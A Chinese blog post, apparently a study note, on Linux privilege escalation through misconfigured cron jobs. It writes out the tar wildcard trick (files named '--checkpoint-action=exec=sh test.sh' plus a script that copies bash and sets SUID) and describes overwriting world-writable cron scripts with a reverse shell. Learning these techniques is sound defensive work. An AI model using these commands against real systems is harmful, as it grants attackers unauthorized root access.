当前位置:首页 » 《休闲阅读》 » 正文

Linux提权--定时任务--打包配合 SUID(本地)&文件权限配置不当(WEB+本地)

7 人参与  2024年05月26日 09:48  分类 : 《休闲阅读》  评论

点击全文阅读


免责声明:本文仅做技术交流与学习...

目录

定时任务 打包配合 SUID-本地

原理:

背景:

操作演示:

分析:

实战发现:

定时任务 文件权限配置不当-WEB&本地

操作演示:


定时任务 打包配合 SUID-本地

原理:

提权通过获取计划任务执行文件信息进行提权 .

1、相对路径和绝对路径执行

2、计划任务命令存在参数调用

利用计划任务的备份功能 tar 命令的参数利用 .

(大部分为本地提权)

背景:

定时任务-->
背景:
运维为了防止数据丢失等,写个定时任务进行数据的打包压缩.
由于数据打包压缩tar命令.
tar可以尝试加参数调用其他命令执行
cd /tmp;tar czf /tmp/backup.tar.gz*
来到tmp目录压缩成backup.tar.gz(当前所有)

--(网站和数据库经常进行备份,tar压缩---隔段时间进行打包.)

操作演示:

#tar--checkpoint=1调用其他命令执行echo "" > --checkpoint=1  echo "" > "--checkpoint-action=exec=sh test.sh"  echo 'cp /bin/bash /tmp/bash;chmod +s /tmp/bash' > test.sh  chmod +x test.sh #创建好文件之后把定时任务开起来.

---文件弄好之后,把定时任务开起来--->

--等待定时任务的运行(打包)

-->得到压缩文件和一个bash文件(test.sh没有运行.)

./bash 命令怎么执行呢??? 多加个 -p 参数.

./bash -p

分析:

实战发现:

查看定时任务有没有可利用(tar打包压缩).


定时任务 文件权限配置不当-WEB&本地

--就是权限配置不当,其他的低权限可以调用,执行等等.

利用不安全的权限分配操作导致的定时文件覆盖

chmod 777 775 等 所有者 组 其他成员说明

操作演示:

--定时任务里添加vim /etc/crontab111.sh < ps(或反弹命令)./111/sh  发现没权限执行 ---chmod +x后才可以.(因为需要权限啊,)

所以:

如果root用户给文件 777 的权限,那么其他用户和组都能动他了.

改完之后,(写个反弹命令)

--当文件被计划任务调用的时候就上线了.


点击全文阅读


本文链接:http://zhangshiyu.com/post/113724.html

<< 上一篇 下一篇 >>

  • 评论(0)
  • 赞助本站

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

关于我们 | 我要投稿 | 免责申明

Copyright © 2020-2022 ZhangShiYu.com Rights Reserved.豫ICP备2022013469号-1